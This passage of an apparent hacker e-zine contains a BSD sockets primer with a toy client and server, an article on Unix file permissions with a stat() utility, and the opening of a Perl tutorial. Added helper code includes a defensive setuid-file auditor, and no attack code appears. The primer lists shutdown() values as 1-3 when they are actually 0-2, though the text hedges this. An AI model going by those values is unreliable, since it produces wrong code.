If you want to connect to a remote machine, there's no getting around using the connect() function:

------
#include <sys/types.h>
#include <sys/socket.h>

int connect(int sockfd, struct sockaddr *serv_addr, int addrlen);
------

sockfd is our friendly socket file descriptor returned from our call to socket()
serv_addr is a struct sockaddr containing the destination port and IP address
addrlen can be set to sizeof(struct sockaddr)

Let's have another example:

------
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <strings.h>

#define DEST_IP   "132.241.5.10"
#define DEST_PORT 23

int main(void)
{
    int sockfd;
    struct sockaddr_in dest_addr;   /* will hold the destination addr */

    sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */

    dest_addr.sin_family = AF_INET;                  /* host byte order */
    dest_addr.sin_port = htons(DEST_PORT);           /* short, network byte order */
    dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
    bzero(&(dest_addr.sin_zero), 8);                 /* zero the rest of the struct */

    connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));
    /* error checking code here */

    /* more code . . . */
    return 0;
}
------

Again, connect() returns 0 on success, -1 on error and sets errno.

You may have noticed the lack of a call to bind() because we don't care what port we connect from; in a case like this the only port that matters is the one we're connecting to.

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=
Listening for calls using: listen()

Let's say we want to make a server program of some sort. We need some way to listen for incoming connections, don't we? Let's see if the listen() function works (it just might ya know ;))

------
#include <sys/types.h>
#include <sys/socket.h>

int listen(int sockfd, int backlog);
------

sockfd again is our socket file descriptor
backlog is how many pending connections we'll queue at once

Again, as usual, listen() returns -1 and sets errno on error.
Now in this case we will need to call bind() before we call listen() (we want a regular port for people to connect to instead of making them guess). Our function order so far would be:

------
socket();  /* to create our socket file descriptor */
bind();    /* to give our socket a name */
listen();  /* listen for connections */
------

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

Taking the connection using: accept()

Ok, this is where the...uhm...fun begins. Someone tries to connect to a port you happen to be listening on; you need to accept that connection now, and accept() will do just that (who knew? ;))

------
#include <sys/types.h>
#include <sys/socket.h>

int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
------

Again, sockfd is our friendly socket file descriptor
addr    is usually going to be a pointer to a struct sockaddr_in (cast to struct sockaddr *)
addrlen will be set to: sizeof(struct sockaddr_in)

Can you guess what gets returned on error?...you got it...-1 and errno gets set. E.G:

------
#include <string.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define MYPORT  1500  /* the port users will be connecting to */
#define BACKLOG 5     /* how many pending connections queue will hold */

int main(void)
{
    int sockfd, new_fd;              /* listen on sockfd, new connection on new_fd */
    struct sockaddr_in my_addr;      /* my address information */
    struct sockaddr_in their_addr;   /* connector's address information */
    socklen_t sin_size;

    sockfd = socket(AF_INET, SOCK_STREAM, 0); /* do some error checking! */

    my_addr.sin_family = AF_INET;           /* host byte order */
    my_addr.sin_port = htons(MYPORT);       /* short, network byte order */
    my_addr.sin_addr.s_addr = INADDR_ANY;   /* auto-fill with my IP */
    bzero(&(my_addr.sin_zero), 8);          /* zero the rest of the struct */

    /* did you remember your error checking? */
    bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));

    listen(sockfd, BACKLOG);

    sin_size = sizeof(struct sockaddr_in);
    new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);

    /* . . . */
    return 0;
}
------

Note that we will use the socket descriptor new_fd for all send() and recv() calls.
If you're only getting one single connection, you can close() the original sockfd in order to prevent more incoming connections on the same port, if you so desire.

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

I think we need to talk: send() and recv()

Now we've created a socket, given it a name, listened for and accepted a connection; it's finally time to exchange information with send() and recv():

------
#include <sys/types.h>
#include <sys/socket.h>

int send(int sockfd, const void *msg, int len, int flags);
int recv(int sockfd, void *buf, int len, unsigned int flags);
------

send():
  sockfd - socket file descriptor
  msg    - message to send
  len    - size of message to send
  flags  - read 'man send' for more info, set it to 0 for now :)

recv():
  sockfd - socket file descriptor
  buf    - buffer the received data is written to
  len    - size of buf
  flags  - same as flags in send()

send() example:

------
char *msg = "Hey there people";
int len, bytes_sent;

/* code to socket(), bind(), listen() and accept() */

len = strlen(msg);
bytes_sent = send(sockfd, msg, len, 0);
------

recv() example:

------
char buf[100];
int len, recv_msg;

/* code to socket(), bind(), listen() and accept() */

len = sizeof(buf) - 1;                 /* leave room for a terminating '\0' */
recv_msg = recv(sockfd, buf, len, 0);
if (recv_msg > 0)
    buf[recv_msg] = '\0';              /* recv() does not terminate the data for you */
------

And again, both send() and recv() return -1 on error and set errno. send() may also send fewer bytes than you asked for, so compare bytes_sent against len. If you're using type SOCK_DGRAM you use the sendto() and recvfrom() functions for sending and receiving data.

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

Nice talking to you: close() and shutdown()

Once you're finished exchanging data, it's time to close the connection by simply closing the socket:

------
#include <unistd.h>

/* all your code */

close(sockfd);
------

Pretty easy eh?
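As an added example (not from the original article): the two snippets above skip the checks that bite in practice, namely that send() may move fewer bytes than asked and recv() never terminates what it reads. The helpers below loop over short writes and always keep room for the '\0'; the names are my own, and socketpair() stands in for a real network connection so it runs offline.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Send exactly len bytes, looping over short writes. Returns 0, or -1 with errno set. */
int send_all(int sockfd, const char *msg, size_t len)
{
    size_t sent = 0;

    while (sent < len) {
        ssize_t n = send(sockfd, msg + sent, len - sent, 0);
        if (n == -1) {
            if (errno == EINTR)
                continue;           /* interrupted by a signal: retry */
            return -1;              /* real error, errno is set */
        }
        sent += (size_t)n;
    }
    return 0;
}

/* Read until the peer shuts down or buf is full, keeping one byte free for
 * the '\0'. Returns the number of bytes stored, or -1 with errno set. */
ssize_t recv_all(int sockfd, char *buf, size_t size)
{
    size_t got = 0;

    if (size == 0) {
        errno = EINVAL;
        return -1;
    }
    while (got < size - 1) {
        ssize_t n = recv(sockfd, buf + got, size - 1 - got, 0);
        if (n == 0)
            break;                  /* orderly shutdown by the peer */
        if (n == -1) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        got += (size_t)n;
    }
    buf[got] = '\0';                /* recv() never terminates the data itself */
    return (ssize_t)got;
}

/* Push msg through a local socketpair() and read it back into out, so the
 * two helpers can be exercised without a network. Returns bytes received or -1. */
ssize_t loopback_exchange(const char *msg, char *out, size_t outsize)
{
    int sv[2];
    ssize_t n;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1)
        return -1;
    if (send_all(sv[0], msg, strlen(msg)) == -1) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }
    shutdown(sv[0], SHUT_WR);       /* no more sends: the reader sees recv() == 0 */
    n = recv_all(sv[1], out, outsize);
    close(sv[0]);
    close(sv[1]);
    return n;
}

int main(void)
{
    char out[8];                    /* deliberately smaller than the message */
    ssize_t n = loopback_exchange("Hey there people", out, sizeof out);

    if (n == -1) {
        perror("loopback_exchange");
        return 1;
    }
    printf("received %zd bytes: \"%s\"\n", n, out);   /* prints 7 bytes: "Hey the" */
    return 0;
}
```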
If you want a bit more control over how the connection gets closed you can use the shutdown() function:

------
#include <sys/socket.h>

int shutdown(int sockfd, int how);
------

There are three different values for how:

1 - no more recv()'s allowed
2 - no more send()'s allowed
3 - no more send()'s or recv()'s allowed (same as close())

(Check the numbers against your own system's man page, and prefer the SHUT_RD, SHUT_WR and SHUT_RDWR constants from sys/socket.h over raw numbers. Note also that shutdown() does not free the descriptor; you still call close() afterwards.)

It's easy as that. You have now created a socket, given it a name, listened for connections, accepted connections, connected to other computers and closed the socket. Not bad for a day's work, eh?

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

Who are you: getpeername()

So you want to know who it is that's connecting to you? Well, you're in luck! There just so happens to be a function for just that purpose:

------
#include <sys/socket.h>

int getpeername(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
------

sockfd  - our friendly socket file descriptor rears its ugly head again
addr    - a pointer to either 'struct sockaddr' or 'struct sockaddr_in'
addrlen - should be set to: sizeof(struct sockaddr)

My oh my, getpeername() also returns -1 on error, who would have guessed? If this call worked right, you now have the peer's address and can use inet_ntoa() or gethostbyaddr() to print more info. Not their login name though, unless they're running identd, but that's beyond what we're talking about here. Read RFC 1413 for more information on that.

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

Who am I: gethostname()

Ok, getpeername() was easy; well, gethostname() is easier.

------
#include <unistd.h>

int gethostname(char *hostname, size_t size);
------

hostname - an array of type char that will hold the host name on return
size     - size of the above mentioned array

This returns the name of the computer your program is running on and can then be used with gethostbyname() to print out your IP address. Again, -1 on error and sets errno.

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

What's your IP?
Well, let's put that information to use, ok? We'll make our first full-fledged program, a DNS program. DNS or "Domain Name Service" is a way of getting a machine's IP address by using its "human-readable" address. Have you ever telneted to a machine and seen:

$ telnet microsoft.com
Trying 206.163.24.176

(not the real address but I'm too lazy to try :)) Well guess what, the first thing the telnet program did was a DNS check on microsoft.com so it could find the IP. Now, to do this we'll be using the function gethostbyname(), which can be found in netdb.h:

------
#include <netdb.h>

struct hostent *gethostbyname(const char *name);
------

By looking at that you see it uses a structure called 'struct hostent' which looks like:

------
struct hostent {
    char  *h_name;
    char **h_aliases;
    int    h_addrtype;
    int    h_length;
    char **h_addr_list;
};
#define h_addr h_addr_list[0]
------

This structure breaks down to:

h_name      - Official name of host
h_aliases   - A NULL-terminated array of alternate names for the host.
h_addrtype  - The type of address being returned; usually AF_INET.
h_length    - The length of the address in bytes.
h_addr_list - A zero-terminated array of network addresses for the host. Host addresses are in Network Byte Order.
h_addr      - The first address in h_addr_list

gethostbyname() returns a pointer to the filled struct hostent, or NULL on error. (But errno is not set; h_errno is set instead.
See 'man herror' for more help.)

Now let's make our DNS program:

------
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    struct hostent *h;

    if (argc != 2) {  /* error checking on the command line */
        fprintf(stderr, "Usage: getip hostname\n");
        exit(1);
    }

    if ((h = gethostbyname(argv[1])) == NULL) {  /* get the host info */
        herror("gethostbyname");
        exit(1);
    }

    printf("Host name  : %s\n", h->h_name);
    printf("IP Address : %s\n", inet_ntoa(*((struct in_addr *)h->h_addr)));

    return 0;
}
------

And there you go, small and easy, just the way we like it. Compile it with:

gcc -o getip getip.c

(assuming you saved it as getip.c :))

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

Client and Server programs

Ok, let's end this discussion with a small, and somewhat pointless, client-server application. The only purpose of this is for a user to connect to the server, receive a predefined string, then disconnect, but it should get the point across. I'll leave making it more useful as a job for you to do... oh, you can do the error checking in it too :)

<++> socket/server.c
/* SERVER PROGRAM */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT    1500  /* the port users will be connecting to */
#define BACKLOG 5     /* how many pending connections queue will hold */

int main(void)
{
    int sockfd, new_fd;              /* listen on sockfd, new connection on new_fd */
    struct sockaddr_in my_addr;      /* our address information */
    struct sockaddr_in their_addr;   /* their address information */
    socklen_t sin_size;

    sockfd = socket(AF_INET, SOCK_STREAM, 0); /* remember to error check (-1 on error) */

    my_addr.sin_family = AF_INET;           /* host byte order */
    my_addr.sin_port = htons(PORT);         /* short, network byte order */
    my_addr.sin_addr.s_addr = INADDR_ANY;   /* auto-fill with my IP */
    bzero(&(my_addr.sin_zero), 8);          /* zero the rest of the struct */

    bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));

    listen(sockfd, BACKLOG);

    while (1) {  /* start our accept() loop */
        sin_size = sizeof(struct sockaddr_in);
        new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
        printf("server: got connection from %s\n", inet_ntoa(their_addr.sin_addr));

        if (fork() == 0) {  /* this is the child process */
            close(sockfd);  /* the child doesn't need the listener */
            send(new_fd, "Hello, world!\n", 14, 0);
            close(new_fd);
            exit(0);
        }
        close(new_fd);      /* the parent doesn't need this */

        while (waitpid(-1, NULL, WNOHANG) > 0);  /* clean up child processes */
    }
}
/* END SERVER PROGRAM, REMEMBER TO DO YOUR ERROR CHECKING */
<-->

<++> socket/client.c
/* CLIENT PROGRAM */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT        1500  /* the port client will be connecting to */
#define MAXDATASIZE 100   /* max number of bytes we can get at once */

int main(int argc, char *argv[])
{
    int sockfd, numbytes;
    char buf[MAXDATASIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;   /* connector's address information */

    if (argc != 2) {
        fprintf(stderr, "Usage: client hostname\n");
        exit(1);
    }

    he = gethostbyname(argv[1]);  /* get the host info */
    /* did you check for errors? */

    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    their_addr.sin_family = AF_INET;        /* host byte order */
    their_addr.sin_port = htons(PORT);      /* short, network byte order */
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&(their_addr.sin_zero), 8);       /* zero the rest of the struct */

    connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr));

    /* read at most MAXDATASIZE-1 bytes so the '\0' below always fits */
    numbytes = recv(sockfd, buf, MAXDATASIZE - 1, 0);
    if (numbytes == -1) {
        perror("recv");
        exit(1);
    }
    buf[numbytes] = '\0';

    printf("Received: %s", buf);

    close(sockfd);
    return 0;
}
/* END CLIENT...YOU CHECKED FOR ERRORS RIGHT? :) */
<-->

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

Well, I think that's about it for now. This is by no means the complete guide to socket programming. Actually, it's very far from being that, and it was never intended to be that, so no problem.
For further reading on this topic I would suggest checking out the following man pages: socket, bind, connect, perror, herror, listen, accept, send, recv, close, shutdown, getpeername, getsockname, gethostbyname, gethostbyaddr and getprotobyname.

You may also find the following books to be good reading:

------
Internetworking with TCP/IP, volumes I-III by Douglas E. Comer and David L. Stevens. Published by Prentice Hall. Second edition ISBNs: 0-13-468505-9, 0-13-472242-6, 0-13-474222-2. There is a third edition of this set which covers IPv6 and IP over ATM.

Using C on the UNIX System by David A. Curry. Published by O'Reilly & Associates, Inc. ISBN 0-937175-23-4.

TCP/IP Network Administration by Craig Hunt. Published by O'Reilly & Associates, Inc. ISBN 0-937175-82-X.

TCP/IP Illustrated, volumes 1-3 by W. Richard Stevens and Gary R. Wright. Published by Addison Wesley. ISBNs: 0-201-63346-9, 0-201-63354-X, 0-201-63495-3.

UNIX Network Programming by W. Richard Stevens. Published by Prentice Hall. ISBN 0-13-949876-1.
------

Wanna get the absolute lowdown on things? Check out these RFCs:

------
RFC-768  -- The User Datagram Protocol (UDP)           (ftp://nic.ddn.mil/rfc/rfc768.txt)
RFC-791  -- The Internet Protocol (IP)                 (ftp://nic.ddn.mil/rfc/rfc791.txt)
RFC-793  -- The Transmission Control Protocol (TCP)    (ftp://nic.ddn.mil/rfc/rfc793.txt)
RFC-854  -- The Telnet Protocol                        (ftp://nic.ddn.mil/rfc/rfc854.txt)
RFC-951  -- The Bootstrap Protocol (BOOTP)             (ftp://nic.ddn.mil/rfc/rfc951.txt)
RFC-1350 -- The Trivial File Transfer Protocol (TFTP)  (ftp://nic.ddn.mil/rfc/rfc1350.txt)
------

Well, this is it I guess, time to bid you a farewell and a happy journey into sockets programming. As I said before, this is *NOT* a complete manual, it is merely a small primer. There may be huge errors in here that I've totally missed; oh well, such is life, I never claimed to be an expert ;) Maybe soon I'll get around to doing a paper on type SOCK_DGRAM and other such socket oddities. 'Till then, have fun.
~xphantom

=+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+==+=

-------[ File permissions
by Lamagra
http://bounce.to/unah16

-----------[ Introduction

Although permissions determine who can read, write or execute a file, they also determine the file type and how the file is executed. You can display the permissions of a file with the command 'ls -l'. An example listing might look like this:

drwx------   2 tom   users    512 Jan  3 13:44 Mail
drwx------   5 tom   users   1024 Jan 17 08:22 nsmail
drwx------   2 root  root     512 Dec 28 22:44 bin
-rw-r--r--   1 tom   users  23801 Jan  4 15:05 picture.gif
-rw-------   1 tom   users    787 Jan 12 06:35 prog.c
-rwx--x--x   1 tom   users  44692 Jan 12 06:41 prog
    1        2  3     4        5        6          7

The first column shows us the file permissions, the second column tells us the number of links to the file, and the third column shows who owns the file. The fourth column shows what group the file belongs to, and the fifth column tells the number of bytes used by the file. The sixth column holds the date and time of creation, and the seventh shows the name.

-----------[ Permissions

The file permission field is divided into four sub-fields:

- rwx rwx rwx

The first sub-field defines the file type. The different types are:

-  normal file
b  block device
c  character device
d  directory
l  symbolic link

The next three sub-fields define the actual file permissions. The first three characters are the user permissions, the next three the group permissions and the last three are the permissions for everyone else. The characters have the following meanings:

r  read permission
w  write permission
x  permission to execute
s  user ID bit
t  sticky bit

The sticky bit tells the system to save a copy of a running program in memory after the program completes. This way the system can save a little time the next time the program is executed, because it doesn't have to be reloaded into memory. (That is the bit's historical meaning on executables; on today's systems you mostly meet it on directories such as /tmp, where it means that only a file's owner, the directory's owner or root may delete or rename the files inside.)

Permissions can be changed with the 'chmod' command in an absolute or relative manner.
The absolute manner uses octal permissions; the following table shows a list of valid octal permissions:

0001  execute permission for everyone
0002  write permission for everyone
0004  read permission for everyone
0010  execute permission for the group
0020  write permission for the group
0040  read permission for the group
0100  execute permission for the owner
0200  write permission for the owner
0400  read permission for the owner
1000  sticky bit
2000  group ID bit if the file is executable, otherwise mandatory file locking
4000  user ID bit if the file is executable

You give a file read and write permission for the owner and read permission for the group and everyone else in the following manner:

0200  write permission for owner
0400  read permission for owner
0040  read permission for group
0004  read permission for everyone
______________________________________
0644  read and write for owner + read for everyone.

chmod 644 file

Relative permissions are slightly different. You have to state the following:

* whom you're giving permissions to
* what operation you intend to perform
* what the permissions are

whom:
  a  all users
  g  group
  o  others
  u  user

operator:
  +  add
  -  remove
  =  set

permissions: the characters above

example: read and write for owner + read for everyone

chmod u=rw,g=r,o=r file

-----------[ SUID and SGID

SUID is short for Set User ID, and SGID is short for Set Group ID. When you run an executable file with these permissions, its effective UID (User ID) is set to that of the user that owns the file. SGID is similar except it changes the GID (Group ID) instead. Although this feature is very useful, it can present a huge security hole. SUID programs are generally used when the program needs special permissions, such as root permission, to run.

-----------[ file permissions in C

Every single bit of information about a file is found inside a structure called an i-node.
To get that information you can use the three following system calls:

int stat(const char *path, struct stat *statb);
int lstat(const char *path, struct stat *statb);
int fstat(int fd, struct stat *statb);

stat() is the most commonly used syscall of the three. It gets the information on a file using the path and places it into the structure statb. The only difference between lstat() and stat() is that when the file is a symbolic link, stat() returns information about the file the link happens to point to, while lstat() returns info about the link itself. fstat() takes a file descriptor of an open file and reads info about that file.

The structure stat can be found in /usr/include/sys/stat.h and is defined as the following:

struct stat {
    dev_t         st_dev;      /* device */
    ino_t         st_ino;      /* inode */
    mode_t        st_mode;     /* file permissions */
    nlink_t       st_nlink;    /* number of hard links */
    uid_t         st_uid;      /* user ID of the owner */
    gid_t         st_gid;      /* group id of the owner */
    dev_t         st_rdev;     /* device type */
    off_t         st_size;     /* total size in bytes */
    unsigned long st_blksize;  /* blocksize for filesystem I/O */
    unsigned long st_blocks;   /* number of blocks */
    time_t        st_atime;    /* time of last access */
    time_t        st_mtime;    /* time of last modification */
    time_t        st_ctime;    /* time of last change */
};

st_dev:   This is the major and minor device numbers of the device on which the i-node associated with this file (and therefore the file itself) is stored.
st_nlink: The number of links associated with a file. If a file has just been created, it has the value '1'. This value is incremented by 1 for every hard link that is made to the file.
st_rdev:  If the file is a character-special or block-special device then this field contains the major and minor device numbers of the file. (Unlike st_dev, which has the major and minor device numbers of the device on which the file is stored.)
st_atime: The last time the file was accessed for reading, or the last time that it was executed, if executable.
st_mtime:   This is changed by write(), mknod(), utime(), and by changes in owner, group, hard link count, or mode.
st_ctime:   This is changed by writing and changes of i-node information (owner, group, link count, etc.)
st_blksize: A hint to programs about the best buffer size to use for I/O operations on this file.
st_blocks:  The total number of physical blocks that are actually allocated on the disk for this file.

The st_mode member of struct stat defines both the file type and its permission bits. The following constants are used to determine the file type:

S_IFMT:   bitmask for the file type bitfields.
S_IFREG:  Regular file
S_IFDIR:  Directory
S_IFCHR:  Character device
S_IFBLK:  Block device
S_IFLNK:  Symbolic link
S_IFIFO:  FIFO file
S_IFSOCK: socket

There is also a set of POSIX macros to check the file type:

S_ISREG:  regular file.
S_ISDIR:  directory.
S_ISCHR:  character device.
S_ISBLK:  block device.
S_ISLNK:  symbolic link.
S_ISFIFO: FIFO type file.
S_ISSOCK: socket.

The next constants will give you information about a file's ownership, permission values etc.:

S_ISUID: User ID bit set.
S_ISGID: Group ID bit set.
S_ISVTX: Sticky bit set.
S_IRWXU: The owner has read, write and execute permission.
S_IRUSR: The owner has read perms for the file (same as S_IREAD).
S_IWUSR: The owner has write perms for the file (same as S_IWRITE).
S_IXUSR: The owner has execute perms for the file (same as S_IEXEC).
S_IRWXG: The group has read, write and execute permission.
S_IRGRP: The group has read perms for the file.
S_IWGRP: The group has write perms for the file.
S_IXGRP: The group has execute perms for the file.
S_IROTH: Everyone has read perms for the file.
S_IWOTH: Everyone has write perms for the file.
S_IXOTH: Everyone has execute perms for the file.
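Putting those constants to use, as an added example that is not part of Lamagra's article: an audit routine that takes the st_mode and st_uid fields of struct stat and flags the combinations a defender looks for (setuid/setgid executables, world-writable files, and world-writable directories missing the sticky bit). The function names and the sample i-nodes in main() are my own constructions.

```c
#define _XOPEN_SOURCE 700   /* S_IFMT/S_IFREG/... and lstat() under strict compilers */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Findings audit_mode() can raise, combined with OR. */
enum {
    PERM_SETUID_ROOT        = 1 << 0,  /* setuid executable owned by uid 0 */
    PERM_SETUID_OTHER       = 1 << 1,  /* setuid executable owned by anyone else */
    PERM_SETGID             = 1 << 2,  /* setgid executable */
    PERM_WORLD_WRITE        = 1 << 3,  /* regular file writable by everyone */
    PERM_WORLD_DIR_NOSTICKY = 1 << 4   /* world-writable directory without the sticky bit */
};

/* Classify one i-node from the st_mode and st_uid fields of struct stat. */
unsigned audit_mode(mode_t mode, uid_t uid)
{
    unsigned flags = 0;
    int executable = (mode & (S_IXUSR | S_IXGRP | S_IXOTH)) != 0;

    if (S_ISREG(mode) && executable) {       /* the 4000/2000 bits only matter on executables */
        if (mode & S_ISUID)
            flags |= (uid == 0) ? PERM_SETUID_ROOT : PERM_SETUID_OTHER;
        if (mode & S_ISGID)
            flags |= PERM_SETGID;
    }
    if (S_ISREG(mode) && (mode & S_IWOTH))
        flags |= PERM_WORLD_WRITE;
    /* /tmp-style directories are acceptable only because S_ISVTX is set on them */
    if (S_ISDIR(mode) && (mode & S_IWOTH) && !(mode & S_ISVTX))
        flags |= PERM_WORLD_DIR_NOSTICKY;
    return flags;
}

/* lstat() a path (a symlink is judged as a link, not as its target) and
 * audit it. Returns 0 and fills *flags, or -1 with errno set by lstat(). */
int audit_path(const char *path, unsigned *flags)
{
    struct stat st;

    if (lstat(path, &st) == -1)
        return -1;
    *flags = audit_mode(st.st_mode, st.st_uid);
    return 0;
}

/* Render the findings as a short space-separated string in buf (size bytes). */
const char *describe(unsigned flags, char *buf, size_t size)
{
    static const struct { unsigned bit; const char *name; } names[] = {
        { PERM_SETUID_ROOT,        "setuid-root" },
        { PERM_SETUID_OTHER,       "setuid" },
        { PERM_SETGID,             "setgid" },
        { PERM_WORLD_WRITE,        "world-writable" },
        { PERM_WORLD_DIR_NOSTICKY, "world-writable-dir-no-sticky" },
    };
    size_t i;

    buf[0] = '\0';
    if (flags == 0) {
        strncat(buf, "ok", size - 1);
        return buf;
    }
    for (i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (flags & names[i].bit) {
            if (buf[0] != '\0')
                strncat(buf, " ", size - strlen(buf) - 1);
            strncat(buf, names[i].name, size - strlen(buf) - 1);
        }
    }
    return buf;
}

int main(void)
{
    /* Constructed sample i-nodes, not read from any real system. */
    static const struct { const char *label; mode_t mode; uid_t uid; } samples[] = {
        { "root setuid helper",  S_IFREG | 04755, 0 },
        { "user setuid binary",  S_IFREG | 04755, 1000 },
        { "setuid but not exec", S_IFREG | 04644, 0 },
        { "world-writable file", S_IFREG | 0666,  1000 },
        { "tmp-style directory", S_IFDIR | 01777, 0 },
        { "drop-box directory",  S_IFDIR | 0777,  0 },
    };
    char text[96];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-22s %05o uid=%-5u -> %s\n", samples[i].label,
               (unsigned)(samples[i].mode & 07777), (unsigned)samples[i].uid,
               describe(audit_mode(samples[i].mode, samples[i].uid), text, sizeof text));
    return 0;
}
```

audit_path() is the piece you would drop into a directory walk; the verdict for a real file comes from the same audit_mode() the samples exercise.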
----->cut here<-------->cut here<-------->cut here<-------->cut here<----
<++> perms/mystat.c
/* gcc mystat.c -o mystat */

/* includes */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/sysmacros.h>   /* major() and minor() on Linux/glibc */

/* prototypes */
char *filetype(mode_t);
char *fileperms(mode_t);
void statinfo(char *, struct stat *);

void usage(char *prog)
{
    printf("usage: %s file\n", prog);
    exit(-1);
}

int main(int argc, char **argv)
{
    struct stat st;

    if (argc != 2) usage(argv[0]);
    if (lstat(argv[1], &st) < 0) {
        perror(argv[1]);
        exit(-1);
    }
    statinfo(argv[1], &st);
    exit(0);
}

void statinfo(char *filename, struct stat *st)
{
    printf("File Name:\t%s\n", filename);
    printf("File Type:\t%s\n", filetype(st->st_mode));
    if (((st->st_mode & S_IFMT) != S_IFCHR) && ((st->st_mode & S_IFMT) != S_IFBLK)) {
        printf("File Size:\t%lld bytes, %lld blocks\n",
               (long long)st->st_size, (long long)st->st_blocks);
        printf("I/O Unit:\t%ld bytes\n", (long)st->st_blksize);
    } else {
        printf("Device Numbers: Major: %u Minor: %u\n",
               major(st->st_rdev), minor(st->st_rdev));
    }
    printf("Permissions:\t%s(%04o)\n", fileperms(st->st_mode), st->st_mode & 07777);
    printf("Inode Number:\t\t%lu\n", (unsigned long)st->st_ino);
    printf("Owner Userid:\t\t%u\n", (unsigned)st->st_uid);
    printf("Owner Group-id:\t\t%u\n", (unsigned)st->st_gid);
    printf("Hard link count:\t%lu\n", (unsigned long)st->st_nlink);
    printf("File system device: Major: %u Minor: %u\n",
           major(st->st_dev), minor(st->st_dev));
    printf("Last access:\t\t%s", ctime(&st->st_atime));
    printf("Last modification:\t%s", ctime(&st->st_mtime));
    printf("Last i-node change:\t%s", ctime(&st->st_ctime));
}

char *filetype(mode_t mode)
{
    switch (mode & S_IFMT) {
        case S_IFREG:  return "regular file";
        case S_IFDIR:  return "directory";
        case S_IFCHR:  return "character device";
        case S_IFBLK:  return "block device";
        case S_IFLNK:  return "symbolic link";
        case S_IFIFO:  return "fifo";
        case S_IFSOCK: return "socket";
    }
    return "unknown";
}

/* Build the rwxrwxrwx string. Each bit writes to a fixed position, so an
 * unset bit leaves its '-' in place and never shifts the later characters. */
char *fileperms(mode_t mode)
{
    int i;
    static char perms[10];

    strcpy(perms, "---------");
    for (i = 0; i < 3; i++) {   /* i = 0: owner, 1: group, 2: others */
        if (mode & (S_IRUSR >> (i * 3))) perms[i * 3]     = 'r';
        if (mode & (S_IWUSR >> (i * 3))) perms[i * 3 + 1] = 'w';
        if (mode & (S_IXUSR >> (i * 3))) perms[i * 3 + 2] = 'x';
    }
    if (mode & S_ISUID) perms[2] = 's';
    if (mode & S_ISGID) perms[5] = 's';
    if (mode & S_ISVTX) perms[8] = 't';
    return perms;
}
<-->
end of mystat.c

-----------[ Changing file permissions in C

If you need to change the file permissions, you can use this set of functions:

int chmod(const char *path, mode_t mode);
int fchmod(int fd, mode_t mode);

For mode you can use the permission flags above or octal numbers. If you're using octals, make sure they're always written as a set of five digits. Example: use chmod("/tmp/bla", 00444) to make /tmp/bla readable for everyone.

To change ownership, you can use these system calls:

int chown(const char *path, uid_t owner, gid_t group);
int lchown(const char *path, uid_t owner, gid_t group);
int fchown(int fd, uid_t owner, gid_t group);

If owner/group is -1, the owner/group will remain the same as before.

-----------[ Ending

I hope you learned something new, although file permissions are really basic. For the next edition of the e-zine, I'll write some more difficult guides. Like always, if you have any further questions, remarks or anything, you can find me on IRC (irc.box5.net) in some channel. Until we meet again, lamagra out.

----[ EOF

An introduction to perl
=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=

Perl: Volume 1

Hello and welcome to the Perl section of the list. This is Darkmo0n, I'm gonna be writing some Perl tutorials for the list. When we're all done you should know enough Perl to make almost anything ya want. So.. let's get started already..

WHAT IS PERL:

